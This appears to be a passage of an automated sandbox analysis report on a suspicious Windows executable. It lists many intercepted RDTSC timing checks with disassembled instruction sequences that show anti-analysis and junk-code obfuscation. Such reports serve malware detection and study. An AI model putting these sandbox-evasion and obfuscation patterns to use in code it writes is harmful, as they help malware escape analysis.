Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 10F4810 second address: 10F4816 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 10F4816 second address: 10F4824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jne 00007FE801498576h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 10F5199 second address: 10F51A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 10F51A0 second address: 10F51A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 10F51A9 second address: 10F51B3 instructions: 0x00000000 rdtsc 0x00000002 js 00007FE80147ABF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 10F52E4 second address: 10F52E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 10F52E8 second address: 10F52F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 10F52F2 second address: 10F52F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 10F52F8 second address: 10F5328 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FE80147AC06h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jp 00007FE80147ABFEh 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 10F5328 second address: 10F532C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 10F9281 second address: 10F92A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147AC07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 10F92A3 second address: 10F92AD instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE801498576h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 10F93EE second address: 10F93F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 10F9534 second address: 10F953A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 10F953A second address: 10F953E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 10F953E second address: 10F9564 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE801498587h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 10F9564 second address: 10F9568 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 10FC5BC second address: 10FC5C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 10FC5C1 second address: 10FC5C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 10FC5C7 second address: 10FC5D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FE801498576h 0x0000000a popad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 1100A44 second address: 1100A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 1100014 second address: 1100018 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 1100018 second address: 1100022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 11001B8 second address: 11001C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FE801498576h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 11001C2 second address: 11001D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147AC00h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 11008C0 second address: 11008C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 11008C4 second address: 11008E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147AC05h 0x00000007 jc 00007FE80147ABF6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 11008E3 second address: 11008FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FE801498576h 0x00000009 pushad 0x0000000a popad 0x0000000b jc 00007FE801498576h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 push ebx 0x00000016 push edx 0x00000017 pop edx 0x00000018 pop ebx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 11008FF second address: 1100905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 11018FD second address: 1101901 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 1101901 second address: 1101907 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 1101907 second address: 1101944 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE801498583h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 2DEAD27Eh 0x00000010 push ebx 0x00000011 or di, 49BDh 0x00000016 pop edi 0x00000017 push E2BA720Bh 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FE801498581h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 1101944 second address: 110194F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FE80147ABF6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 1101CC5 second address: 1101CC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 1101CC9 second address: 1101CD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 1102481 second address: 110248E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 110248E second address: 11024AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147AC09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 11024AB second address: 11024B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 11029AF second address: 11029B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 11047CC second address: 11047D2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 1105251 second address: 11052DC instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE80147AC03h 0x00000008 jmp 00007FE80147ABFDh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 jmp 00007FE80147AC00h 0x00000016 pop eax 0x00000017 nop 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b call 00007FE80147ABF8h 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], edi 0x00000025 add dword ptr [esp+04h], 00000018h 0x0000002d inc edi 0x0000002e push edi 0x0000002f ret 0x00000030 pop edi 0x00000031 ret 0x00000032 movsx esi, dx 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push esi 0x0000003a call 00007FE80147ABF8h 0x0000003f pop esi 0x00000040 mov dword ptr [esp+04h], esi 0x00000044 add dword ptr [esp+04h], 00000018h 0x0000004c inc esi 0x0000004d push esi 0x0000004e ret 0x0000004f pop esi 0x00000050 ret 0x00000051 clc 0x00000052 push 00000000h 0x00000054 movzx esi, di 0x00000057 xchg eax, ebx 0x00000058 jmp 00007FE80147ABFDh 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 pop eax 0x00000064 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 11052DC second address: 11052E6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE801498576h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 1105D0B second address: 1105D10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 1105A83 second address: 1105A88 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 110CA1D second address: 110CA4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147ABFDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c add di, 35D5h 0x00000011 push 00000000h 0x00000013 mov dword ptr [ebp+12473B63h], ebx 0x00000019 push 00000000h 0x0000001b mov dword ptr [ebp+122D181Dh], ebx 0x00000021 xchg eax, esi 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 11085D8 second address: 11085DE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 110CA4C second address: 110CA50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 110CA50 second address: 110CA5A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 110BC5B second address: 110BC5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 110CA5A second address: 110CA5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 110BC5F second address: 110BC63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 110BC63 second address: 110BD04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007FE801498578h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 or edi, 571C8B67h 0x0000002a push dword ptr fs:[00000000h] 0x00000031 mov edi, dword ptr [ebp+122D28F3h] 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e sub dword ptr [ebp+122D3B21h], eax 0x00000044 mov eax, dword ptr [ebp+122D0C01h] 0x0000004a push 00000000h 0x0000004c push eax 0x0000004d call 00007FE801498578h 0x00000052 pop eax 0x00000053 mov dword ptr [esp+04h], eax 0x00000057 add dword ptr [esp+04h], 00000014h 0x0000005f inc eax 0x00000060 push eax 0x00000061 ret 0x00000062 pop eax 0x00000063 ret 0x00000064 call 00007FE801498581h 0x00000069 mov ebx, 3AC021A4h 0x0000006e pop edi 0x0000006f sbb edi, 05C561C3h 0x00000075 push FFFFFFFFh 0x00000077 cld 0x00000078 nop 0x00000079 push eax 0x0000007a push edx 0x0000007b jmp 00007FE801498582h 0x00000080 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 110CBDF second address: 110CBF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE80147AC00h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 110CBF7 second address: 110CC9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80149857Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007FE801498578h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 add dword ptr [ebp+122D1A9Ah], ecx 0x0000002d push dword ptr fs:[00000000h] 0x00000034 jg 00007FE80149857Ch 0x0000003a add ebx, 2AAB7E82h 0x00000040 mov dword ptr fs:[00000000h], esp 0x00000047 sub dword ptr [ebp+122D2462h], eax 0x0000004d mov eax, dword ptr [ebp+122D0629h] 0x00000053 jmp 00007FE80149857Eh 0x00000058 sub di, 2199h 0x0000005d push FFFFFFFFh 0x0000005f push 00000000h 0x00000061 push ebx 0x00000062 call 00007FE801498578h 0x00000067 pop ebx 0x00000068 mov dword ptr [esp+04h], ebx 0x0000006c add dword ptr [esp+04h], 00000014h 0x00000074 inc ebx 0x00000075 push ebx 0x00000076 ret 0x00000077 pop ebx 0x00000078 ret 0x00000079 mov ebx, dword ptr [ebp+122D2138h] 0x0000007f push eax 0x00000080 push eax 0x00000081 push edx 0x00000082 jns 00007FE801498578h 0x00000088 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 110FD19 second address: 110FD7E instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE80147ABF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007FE80147ABF8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D1F79h], ecx 0x0000002d push 00000000h 0x0000002f or edi, 0105C231h 0x00000035 push 00000000h 0x00000037 mov ebx, edx 0x00000039 xchg eax, esi 0x0000003a jo 00007FE80147AC0Ah 0x00000040 jmp 00007FE80147AC04h 0x00000045 push eax 0x00000046 push eax 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 1111BF2 second address: 1111BF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 110FFB6 second address: 110FFBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 1112E79 second address: 1112E7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 1115DB1 second address: 1115DB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 1116DEB second address: 1116DEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 1116DEF second address: 1116DFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 1116DFD second address: 1116E01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 1116E01 second address: 1116E07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 1116E07 second address: 1116E0C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 1115F36 second address: 1115F4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FE80147ABFAh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 1113FCF second address: 1113FF5 instructions: 0x00000000 rdtsc 0x00000002 js 00007FE801498576h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007FE801498581h 0x00000010 jmp 00007FE80149857Bh 0x00000015 popad 0x00000016 push eax 0x00000017 pushad 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b pop edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 1116051 second address: 1116057 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 1116057 second address: 111605C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 1116F40 second address: 1116FC6 instructions: 0x00000000 rdtsc 0x00000002 je 00007FE80147ABF8h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov dword ptr [ebp+122D1BEDh], ecx 0x00000015 push dword ptr fs:[00000000h] 0x0000001c mov dword ptr [ebp+12453F3Dh], ebx 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 push 00000000h 0x0000002b push ebx 0x0000002c call 00007FE80147ABF8h 0x00000031 pop ebx 0x00000032 mov dword ptr [esp+04h], ebx 0x00000036 add dword ptr [esp+04h], 0000001Ch 0x0000003e inc ebx 0x0000003f push ebx 0x00000040 ret 0x00000041 pop ebx 0x00000042 ret 0x00000043 sbb ebx, 0AC4B6BDh 0x00000049 mov eax, dword ptr [ebp+122D0C69h] 0x0000004f push 00000000h 0x00000051 push edi 0x00000052 call 00007FE80147ABF8h 0x00000057 pop edi 0x00000058 mov dword ptr [esp+04h], edi 0x0000005c add dword ptr [esp+04h], 00000016h 0x00000064 inc edi 0x00000065 push edi 0x00000066 ret 0x00000067 pop edi 0x00000068 ret 0x00000069 push FFFFFFFFh 0x0000006b mov di, dx 0x0000006e nop 0x0000006f pushad 0x00000070 jl 00007FE80147ABFCh 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 1117D4A second address: 1117DEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE801498584h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007FE801498578h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 mov edi, dword ptr [ebp+12454650h] 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push esi 0x0000002f call 00007FE801498578h 0x00000034 pop esi 0x00000035 mov dword ptr [esp+04h], esi 0x00000039 add dword ptr [esp+04h], 0000001Ch 0x00000041 inc esi 0x00000042 push esi 0x00000043 ret 0x00000044 pop esi 0x00000045 ret 0x00000046 push 00000000h 0x00000048 call 00007FE80149857Dh 0x0000004d add edi, dword ptr [ebp+122D399Bh] 0x00000053 pop edi 0x00000054 mov dword ptr [ebp+122D39BAh], edx 0x0000005a push eax 0x0000005b pushad 0x0000005c pushad 0x0000005d jmp 00007FE801498583h 0x00000062 pushad 0x00000063 popad 0x00000064 popad 0x00000065 pushad 0x00000066 jg 00007FE801498576h 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 111AEB4 second address: 111AEB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 1119FCD second address: 1119FD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FE801498576h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 111AEB8 second address: 111AED6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FE80147AC04h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 111AED6 second address: 111AF61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jp 00007FE801498576h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f or di, 14F2h 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007FE801498578h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 00000016h 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 mov edi, dword ptr [ebp+122D2012h] 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push edx 0x0000003b call 00007FE801498578h 0x00000040 pop edx 0x00000041 mov dword ptr [esp+04h], edx 0x00000045 add dword ptr [esp+04h], 0000001Ah 0x0000004d inc edx 0x0000004e push edx 0x0000004f ret 0x00000050 pop edx 0x00000051 ret 0x00000052 jmp 00007FE801498586h 0x00000057 xchg eax, esi 0x00000058 je 00007FE801498580h 0x0000005e pushad 0x0000005f pushad 0x00000060 popad 0x00000061 jc 00007FE801498576h 0x00000067 popad 0x00000068 push eax 0x00000069 push ebx 0x0000006a push eax 0x0000006b push edx 0x0000006c pushad 0x0000006d popad 0x0000006e rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 111B198 second address: 111B19C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 1121BD8 second address: 1121BDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
